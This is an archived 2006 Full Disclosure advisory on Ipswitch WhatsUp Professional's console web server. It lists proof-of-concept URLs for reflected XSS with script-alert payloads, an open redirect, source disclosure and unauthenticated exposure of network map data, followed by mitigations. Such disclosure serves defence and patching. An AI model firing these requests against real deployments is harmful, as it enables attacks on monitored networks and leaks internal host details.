Full Disclosure mailing list archives
Ipswitch WhatsUp Professional multiple flaws
From: "David Maciejak" <david.maciejak () gmail com>
Date: Fri, 12 May 2006 00:06:51 +0200
WhatsUp is a tool from Ipswitch to monitor application and network, embedding a custom web server on port 8022. Description: This custom web server is prone to multiple flaws. -as authenticated user: *src disclosure http://server:8022/NmConsole/Login.asp. *there are many XSS flaws, as http://server:8022/NmConsole/Navigation.asp?sDeviceView=<SCRIPT>alert("me");</SCRIPT>&nDeviceID=<SCRIPT>alert("me");</SCRIPT> http://server:8022/NmConsole/ToolResults.asp?bIsIE=true&nToolType=0&sHostname=%3cscript%3ealert('me')%3c/script%3e&nTimeout=2000&nCount=1&nSize=32&btnPing=Ping *redirection http://server:8022/NmConsole/DeviceSelection.asp?sRedirectUrl=Reports/DevicePassiveMonitorSyslog.asp&sCancelURL=http://www.google.fr -not being authenticated: *src disclosure http://server:8022/NmConsole/Login.asp. *network nodes information disclosure (name, internal addr, service) http://server:8022/NmConsole/utility/RenderMap.asp?nDeviceGroupID=0 The weaknesses have been confirmed in version 2006, source disclosure in version 2005 and 2005 SP1 too. Other versions may also be affected. No response from vendor. Solution: -Filtered TCP port 8022, ask a patch from vendor if you are a registered user -Keep an eye on an opensource project: http://gnms.rubyforge.org David Maciejak _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Ipswitch WhatsUp Professional multiple flaws David Maciejak (May 11)